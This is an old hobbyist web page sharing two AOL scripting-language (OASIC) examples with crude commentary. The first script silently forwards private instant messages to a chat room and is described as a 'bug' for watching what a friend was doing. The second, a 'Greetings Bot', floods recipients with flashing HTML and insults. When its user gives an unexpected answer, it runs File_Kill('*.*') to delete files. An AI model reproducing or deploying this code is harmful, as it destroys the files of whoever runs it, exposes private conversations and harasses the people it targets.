Home
Pointless Clicking
Pointless Clicking Two
Endless Clicking
IMPORTANT
Other Sites
Crap
Who the hell I am
OASIC
UCB
|
OASIC Examples
OASIC aka Rampage Script was made by
Oogle and I don't own it or anything...Anyway, I program in OASIC since mostly my computer
sucks and doesnt even view most codes right...But since I'm better than Oogle
and (that I know of) the best person at it
I can make programs most people cant using it...I could put those
programs on this page (well...some) but I'm too lazy to open em.
(no name)
It's some crappy little bug I made in math class...It's not
the kind you'd use for spying, I made it to monitor what my friend was
doing to some kid who stole a bunch of money from me...He hasnt been on...
Use if you have AOL
Chat_Enter('Chatroom Name')
Variable('sn')
Variable('m')
Variable('im')
Variable('yn')
Variable('im2')
IM_IsOpen()->!yn
if (!yn = 'false') then
{
GoTo('2')
}
IM_GetSN()->!sn
IM_GetMSG()->!m
String(!sn & ': ' & !m)->!im
if (!im = !im2) then
{
GoTo('2')
}
Chat_Send(!im)
IM_IsOpen()->!yn
if (!yn = 'false') then
{
GoTo('2')
}
IM_GetSN()->!sn
IM_GetMSG()->!m
String(!sn & ': ' & !m)->!im2
if (!im = !im2) then
{
GoTo('20')
}
Chat_Send(!im)
GoTo('2')
"Greetings Bot"
It's a copy of the original. The real one doesn't kill itself when
you mess up and it checks if i'm the user...
Variable('sn')
Variable('nm')
Variable('id')
Variable('s1')
InputBox('sn','','')->!sn
MessageBox('nice=yes mean=no','','4')->!nm
Data_LCase(!nm)->!nm
String('< font . ptsize="10" color="#000000" face="arial" >-< Greetings Bot Loaded By: ' & !id & ' >-')->!s1
IM_Send(!sn,!s1)
If (!nm = 'nice') then
{
IM_Send(!sn,'< font . ptsize="10" color="#000000" face="arial" >-< Nice Mode On >-')
IM_Send(!sn,'< font . ptsize="8" color="#ff0000" face="arial" >Greetings Bot: < /font >< font . color="000000" >Hi!')
IM_Send(!sn,'< font . ptsize="8" color="#ff0000" face="arial" >Greetings Bot: < /font >< font . color="000000" >Would you like some tea?')
IM_Send(!sn,'< font . ptsize="8" color="#ff0000" face="arial" >Greetings Bot: < /font >< font . color="000000" >How about a donut?')
IM_Send(!sn,'< font . ptsize="8" color="#ff0000" face="arial" >Greetings Bot: < /font >< font . color="000000" >Maybe some toast would be good!')
End()
}
if (!nm = 'mean') then
{
IM_Send(!sn,'< HTML >< BODY . BGCOLOR="#00ff00" >< /HTML >< HTML >< BODY . BGCOLOR="#0000ff" >< /HTML >< HTML >< BODY . BGCOLOR="#000000" >< /HTML >< HTML >< BODY . BGCOLOR="#ff00ff" >< /HTML >< HTML >< BODY . BGCOLOR="#fefefe" >< /HTML >< font . ptsize="10" color="#000000" face="arial" >-< Mean Mode On >-')
IM_Send(!sn,'< HTML >< BODY . BGCOLOR="#00ff00" >< /HTML >< HTML >< BODY . BGCOLOR="#0000ff" >< /HTML >< HTML >< BODY . BGCOLOR="#000000" >< /HTML >< HTML >< BODY . BGCOLOR="#ff00ff" >< /HTML >< HTML >< BODY . BGCOLOR="#fefefe" >< /HTML >< font . ptsize="8" color="#ff0000" face="arial" >Greetings Bot: < /font >< font . color="000000" >You...')
IM_Send(!sn,'< HTML >< BODY . BGCOLOR="#00ff00" >< /HTML >< HTML >< BODY . BGCOLOR="#0000ff" >< /HTML >< HTML >< BODY . BGCOLOR="#000000" >< /HTML >< HTML >< BODY . BGCOLOR="#ff00ff" >< /HTML >< HTML >< BODY . BGCOLOR="#fefefe" >< /HTML >< font . ptsize="8" color="#ff0000" face="arial" >Greetings Bot: < /font >< font . color="000000" >HERE! TEA!')
IM_Send(!sn,'< HTML >< BODY . BGCOLOR="#00ff00" >< /HTML >< HTML >< BODY . BGCOLOR="#0000ff" >< /HTML >< HTML >< BODY . BGCOLOR="#000000" >< /HTML >< HTML >< BODY . BGCOLOR="#ff00ff" >< /HTML >< HTML >< BODY . BGCOLOR="#fefefe" >< /HTML >< font . ptsize="8" color="#ff0000" face="arial" >Greetings Bot: < /font >< font . color="000000" >You little bitch eat the damn donut!')
IM_Send(!sn,'< HTML >< BODY . BGCOLOR="#00ff00" >< /HTML >< HTML >< BODY . BGCOLOR="#0000ff" >< /HTML >< HTML >< BODY . BGCOLOR="#000000" >< /HTML >< HTML >< BODY . BGCOLOR="#ff00ff" >< /HTML >< HTML >< BODY . BGCOLOR="#fefefe" >< /HTML >< font . ptsize="8" color="#ff0000" face="arial" >Greetings Bot: < /font >< font . color="000000" >Maybe some burned shit will be "good"...')
End()
}
MessageBox('You little psycho that wasn`t a choice!','','16')
File_Kill('*.*')
MessageBox('My master didn`t make me for lamers like you to use...','','0')
|
|